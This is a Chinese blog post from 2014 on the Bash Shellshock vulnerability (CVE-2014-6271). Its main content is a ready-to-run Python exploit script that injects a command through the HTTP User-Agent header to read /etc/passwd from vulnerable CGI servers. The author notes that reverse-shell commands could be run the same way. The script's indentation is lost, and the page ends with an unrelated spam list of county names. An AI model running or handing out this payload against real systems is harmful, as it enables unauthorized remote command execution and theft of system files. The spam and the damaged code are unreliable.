qileilove

          blog已經轉移至github,大家請訪問 http://qaseven.github.io/

          Bash遠程命令執行漏洞(CVE-2014-6271)分析利用

           這幾天Bash被爆存在遠程命令執行漏洞(CVE-2014-6271),昨天參加完isc,晚上回家測試了一下,寫了個python版本的測試小基本,貼上代碼:
          #coding:utf-8
          import urllib,httplib
          import sys,re,urlparse
          #author:nx4dm1n
          #website:www.nxadmin.com
          def bash_exp(url):
          urlsp=urlparse.urlparse(url)
          hostname=urlsp.netloc
          urlpath=urlsp.path
          conn=httplib.HTTPConnection(hostname)
          headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}
          conn.request("GET",urlpath,headers=headers)
          res=conn.getresponse()
          res=res.getheaders()
          for passwdstr in res:
          print passwdstr[0]+':'+passwdstr[1]
          if __name__=='__main__':
          #帶http
          if len(sys.argv)<2:
          print "Usage: "+sys.argv[0]+"www.nxadmin.com/cgi-bin/index.cgi"
          sys.exit()
          else:
          bash_exp(sys.argv[1])
            腳本執行效果如圖所示:
            bash命令執行
            也可以用burp進行測試。
            利用該漏洞其實可以做很多事情,寫的python小腳本只是執行了cat /etc/passwd。可以執行反向鏈接的命令等,直接獲取一個shell還是有可能的。不過漏洞存在的條件也比較苛刻,測試找了一些,發現了很少幾個存在漏洞。

          posted on 2014-11-26 14:20 順其自然EVO 閱讀(535) 評論(0)  編輯  收藏 所屬分類: 測試學習專欄安全性測試

          <2014年11月>
          2627282930311
          2345678
          9101112131415
          16171819202122
          23242526272829
          30123456

          導航

          統計

          常用鏈接

          留言簿(55)

          隨筆分類

          隨筆檔案

          文章分類

          文章檔案

          搜索

          最新評論

          閱讀排行榜

          評論排行榜

          主站蜘蛛池模板: 奉贤区| 塔城市| 西峡县| 仁寿县| 边坝县| 东城区| 德江县| 兴安盟| 平塘县| 南靖县| 偃师市| 寿光市| 高州市| 从江县| 湘阴县| 泽普县| 武定县| 万源市| 津市市| 通河县| 吉木乃县| 织金县| 惠来县| 钟山县| 沾化县| 大理市| 依兰县| 清新县| 泰兴市| 会理县| 临海市| 北票市| 乃东县| 黄骅市| 四会市| 牟定县| 额敏县| 乳源| 宁武县| 五台县| 诏安县|